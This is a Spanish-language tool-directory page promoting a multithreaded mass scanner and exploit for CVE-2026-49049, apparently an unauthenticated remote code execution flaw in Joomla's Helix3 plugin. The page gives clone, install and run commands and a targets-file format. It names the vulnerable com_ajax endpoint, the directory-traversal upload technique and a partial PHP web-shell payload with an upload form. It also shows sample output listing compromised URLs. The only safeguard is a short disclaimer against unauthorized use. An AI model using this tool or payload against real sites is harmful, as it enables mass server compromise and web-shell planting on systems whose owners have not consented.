Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/jenderal92/cve-2026-49049
Escáneres de VulnerabilidadesEscáneres de Vulnerabilidades WebGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

Escáner masivo de vulnerabilidades para CVE-2026-49049 – Ejecución Remota de Código no autenticada en el plugin Helix3 de Joomla. Multihilo, detecta payloads PHP ejecutados y crudos.

Ver Repositorio
114hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Escáner masivo CVE-2026-49049

Escáner masivo de vulnerabilidades para CVE-2026-49049: ejecución remota de código sin autenticación en el framework Helix3 de Joomla.


📌 Descripción

Esta herramienta comprueba múltiples sitios Joomla en busca de la vulnerabilidad CVE-2026-49049 encontrada en el plugin Helix3. La vulnerabilidad permite a un atacante no autenticado subir y ejecutar código PHP arbitrario en el servidor objetivo.

El escáner intenta:

  1. Explotar el endpoint com_ajax con el plugin helix3.
  2. Subir un archivo PHP inofensivo de información/payload.
  3. Detectar si el archivo se ejecuta o simplemente se almacena como raw PHP.

⚡ Características

  • Escaneo masivo con multihilo (20 hilos por defecto).
  • Dos modos de detección:
    • ✅ Vulnerable – El código PHP se ejecuta (RCE exitoso).
    • ⚠️ Raw PHP – El archivo se sube pero no se ejecuta (divulgación de código).
  • Generación automática de payloads con nombres de archivo aleatorios.
  • Salida guardada en archivos separados para análisis posterior.
  • Ligero y rápido con gestión de timeouts.

📦 Requisitos previos

  • Python 2.7
  • Biblioteca requests
root@kitploit:~
pip install requests

🛠 Instalación

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 Uso

root@kitploit:~
python2 cve-2026-49049.py targets.txt

Formato de entrada

Cada línea de targets.txt debe contener un dominio o una IP:

root@kitploit:~
example.com
https://example.com
http://192.168.1.100

Archivos de salida

Archivo Descripción results.txt URLs vulnerables donde se ejecutó el payload rez.txt URLs donde se subió el payload pero no se ejecutó (raw PHP)


Ejemplo de salida

root@kitploit:~
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ Configuración

Puedes ajustar las siguientes variables dentro del script:

Variable Valor por defecto Descripción THREADS 20 Número de hilos concurrentes PATHS ['../../../', '../../../../'] Rutas de traversal de directorios TIMEOUT 5 Tiempo de espera (timeout) de las peticiones HTTP RESULT_FILE 'results.txt' Archivo de salida para sitios vulnerables RAW_RESULT_FILE 'rez.txt' Archivo de salida para sitios con raw PHP


🧠 Cómo funciona

El script envía una petición POST a:

root@kitploit:~
/index.php?option=com_ajax&plugin=helix3&format=json

con un payload que:

  1. Especifica una ruta de traversal de directorios (p. ej., ../../../)
  2. Sube un archivo PHP con un nombre aleatorio
  3. Contiene una simple web shell / página de información

Luego comprueba si el archivo es accesible y si el código PHP se ejecuta o simplemente se muestra como texto plano.

Ejemplo de payload

root@kitploit:~
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ Descargo de responsabilidad

Esta herramienta es solo para fines educativos y de pruebas autorizadas.

El uso no autorizado de esta herramienta contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal. El autor no es responsable de ningún uso indebido ni de los daños causados por esta herramienta.

Para más descargos de responsabilidad, puedes ver el aviso en la portada de Jenderal92. Puedes consultarlo AQUÍ !!!


Descargar herramienta